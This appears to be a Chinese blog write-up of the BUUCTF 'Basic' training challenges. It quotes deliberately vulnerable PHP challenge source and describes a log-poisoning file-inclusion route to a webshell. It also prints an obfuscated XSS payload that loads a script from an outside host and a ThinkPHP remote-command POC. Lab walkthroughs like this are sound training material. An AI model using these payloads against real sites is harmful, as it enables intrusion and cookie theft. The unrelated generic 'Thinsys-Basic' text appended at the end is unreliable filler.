BUUCTF-Basic

Basic

Linux Labs

ssh连接/目录下

BUU LFI COURSE 1

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/7/9
 * Time: 7:07 AM
 */

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

文件包含
一句话插入ua头,会写入日志
将日志包含出来,webshell连接工具连接,flag在/目录下

在这里插入图片描述

Upload-Labs-Linux

upload-labs 靶场

在这里插入图片描述

BUU CODE REVIEW 1

https://github.com/glzjin/buusec_2019_code_review_1
https://blog.csdn.net/qq_45555226/article/details/110003144

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

在这里插入图片描述

BUU BRUTE 1

数值爆破

在这里插入图片描述

BUU SQL COURSE 1

注入点

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

sqli-labs

sqli-labs 靶场

在这里插入图片描述

BUU UPLOAD COURSE 1

文件上传,本地包含

在这里插入图片描述

BUU BURP COURSE 1

xff 不行,用 X-Real-IP 头

在这里插入图片描述

BUU XSS COURSE 1

安恒的大佬赵师傅做过一期教程。

https://github.com/wpsec/xsser
http://xss.buuoj.cn/
https://www.bilibili.com/video/BV1XE411f7qT?from=search&seid=6094814016757224378
在这里插入图片描述

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

在这里插入图片描述

在这里插入图片描述

LFI Labs

LFI_labs 靶场
https://github.com/paralax/lfi-labs

在这里插入图片描述
在这里插入图片描述

PikaChu

皮卡丘靶场

https://github.com/zhuifengshaonianhanlu/pikachu

在这里插入图片描述

AWD-Test1

为本平台的 AWD 做准备。。。

glzjin/123456

在这里插入图片描述

POC
POST

s=whoami&_method=__construct&method=POST&filter[]=system

在这里插入图片描述
在这里插入图片描述

[Windows]Upload-Labs-Windows

upload-labs 靶场

在这里插入图片描述

XSS-Lab

https://github.com/rebo-rn/xss-lab

在这里插入图片描述

  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Thinsys-Basic是一种薄型计算机操作系统,它专门设计用于轻薄终端设备。该操作系统的主要特点是资源占用少、启动速度快、高度兼容性和安全性。 首先,Thinsys-Basic以精简的设计理念为基础,只包含最基本的功能和组件,因此它的资源占用非常少。这意味着它可以在资源有限的轻薄终端设备上高效运行,而且用户可以更好地利用设备的存储空间和处理能力。 其次,Thinsys-Basic的启动速度非常快。由于它只加载必要的组件和服务,它可以在短时间内完成启动过程,并让用户迅速进入工作状态。这对于需要频繁启动和关闭设备的用户来说非常重要,因为它能提高工作效率和用户体验。 Thinsys-Basic还具有高度兼容性。它可以与各种软件应用程序、网络协议和硬件设备兼容。这意味着用户可以使用现有的软件和设备,而无需额外的配置和适配。这对于企业和教育机构等组织来说非常有吸引力,因为它简化了部署和管理的复杂性。 最后,Thinsys-Basic非常注重安全性。它采用多种安全机制来保护用户的数据和隐私。例如,它支持访问控制、用户身份验证和加密通信等功能,以防止未经授权的访问和数据泄漏。这对于处理敏感信息的用户来说非常重要,如金融机构和政府部门。 总之,Thinsys-Basic是一种适用于轻薄终端设备的精简操作系统,它具有资源占用少、启动速度快、高度兼容性和安全性的特点。它为用户提供了高效和安全的计算环境,同时简化了部署和管理的复杂性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_abcdef

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值